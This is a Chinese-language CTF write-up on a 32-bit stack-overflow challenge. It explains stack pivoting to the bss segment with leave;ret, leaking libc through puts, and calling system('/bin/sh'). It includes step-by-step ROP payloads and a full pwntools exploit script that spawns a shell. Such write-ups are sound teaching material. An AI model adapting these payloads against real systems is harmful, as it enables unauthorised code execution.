題目的防護(hù)機(jī)制：

image.png

簡(jiǎn)單運(yùn)行了下师倔，程序輸出了一句話役首，然后等待我們輸入
ida反編譯:

image.png

程序邏輯很清楚虫啥，先判斷count的值是否等于1337毡庆，不等的話就執(zhí)行exit()函數(shù)
然后count++,這說(shuō)明我們不能重復(fù)利用main函數(shù)坑赡，即不能將返回地址設(shè)為main
然后輸出一句話 ，再讀入數(shù)據(jù)
很明顯么抗，再read()函數(shù)中存在棧溢出漏洞毅否，因?yàn)椋琤uf的大小為0x28蝇刀，但是它讀入0x40的數(shù)據(jù)
但是我們通過(guò)棧溢出能控制的大小只有0x40-0x28 = 0x18 （24個(gè)字節(jié)）
所以我們構(gòu)造的rop鏈不能太長(zhǎng)螟加，結(jié)合題目的hint 很明顯我們要一步步將棧劫持到不同的地方

棧遷移：主要是為了解決棧溢出可以溢出空間大小不足的問(wèn)題
棧遷移的實(shí)現(xiàn)：(其中一種辦法)
通過(guò)將ebp覆蓋成我們構(gòu)造的fake_ebp ，然后利用leave_ret這個(gè)gadget將esp劫持到fake_ebp的地址上
leave_ret相當(dāng)于：

mov %ebp,%esp  
pop %ebp  
pop %eip  

了解完棧遷移吞琐，再來(lái)看這題
解題思路：

1. 通過(guò)劫持ebp和esp將棧劫持到bss段
2. 利用puts函數(shù)泄露libc內(nèi)存空間信息捆探，得到system函數(shù)在內(nèi)存中的地址 ,順便將棧劫持到另一個(gè)地方
3. 通過(guò)read函數(shù)讀入"/bin/sh"字符串 然后返回調(diào)用system函數(shù)getshell

• 第一步：將棧劫持到bss段
  我將棧劫持到 bss+0x500處

payload = 'a'*0x28 + p32(bss+0x500) + p32(read_plt) 
payload+= p32(leave_ret) + p32(0) + p32(bss+0x500) + p32(0x100)

棧的布局如下：

image.png

函數(shù)執(zhí)行完后會(huì)將bss+0x500 pop給ebp 然后再執(zhí)行l(wèi)eave_ret指令就會(huì)將 ebp的值賦給esp，這樣程序的棧就被劫持到bss + 0x500 了

*第二步：通過(guò)puts函數(shù)泄露出libc的內(nèi)存信息
泄露地址的同時(shí)要將棧遷移到另一個(gè)我們能控制的地方顽分，這里我選的是bss+0x400

payload = p32(bss+0x400) + p32(puts_plt) + p32(pop1ret) + p32(puts_got) + p32(read_plt) + p32(leave_ret)
payload += p32(0) + p32(bss+0x400)+ p32(0x100)  

棧的情況：

image.png

*第三步：執(zhí)行system函數(shù)

payload = p32(bss+0x500) + p32(read_plt) + p32(pop3ret)+p32(0) + p32(bss+0x500) + p32(0x100)  
payload += p32(system_add) + 'bbbb' + p32(bss+0x500)  

棧的情況：

image.png

在放一張棧的總變化情況：
buf = bss + 0x500
buf2 = bss + 0x400

image.png

exp:

#!/usr/bin/env python  
from pwn import*  
context.log_level="debug"  
  
p = process('./migration')  
lib = ELF('/lib/i386-linux-gnu/libc.so.6')  
elf = ELF('./migration')  
  
read_plt = elf.symbols['read']  
puts_plt = elf.symbols['puts']  
puts_got = elf.got['puts']  
read_got = elf.got['read']  
buf = elf.bss() + 0x500  
buf2 = elf.bss() + 0x400  
  
pop1ret = 0x804836d  
pop3ret = 0x8048569  
leave_ret = 0x08048418  
  
puts_lib = lib.symbols['puts']  
system_lib = lib.symbols['system']  
  
p.recv()  
  
log.info("*********************change stack_space*********************")  
junk = 'a'*0x28  
payload = junk + p32(buf) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(buf) + p32(0x100)  
p.send(payload)  
  
  
log.info("*********************leak libc memory address*********************")  
  
payload1 = p32(buf2) + p32(puts_plt) + p32(pop1ret) + p32(puts_got) + p32(read_plt) + p32(leave_ret)  
payload1 += p32(0) + p32(buf2) + p32(0x100)  
p.send(payload1)  
  
puts_add = u32(p.recv(4))  
lib_base = puts_add - puts_lib  
print "libc base address-->[%s]"%hex(lib_base)  
system_add = lib_base + system_lib  
print "system address -->[%s]"%hex(system_add)  
  
log.info("*********************write binsh*********************")  
payload3= p32(buf) + p32(read_plt) + p32(pop3ret) + p32(0) + p32(buf) + p32(0x100) + p32(system_add) + 'bbbb' + p32(buf)  
p.send(payload3)  
p.send("/bin/sh\0")  
p.interactive()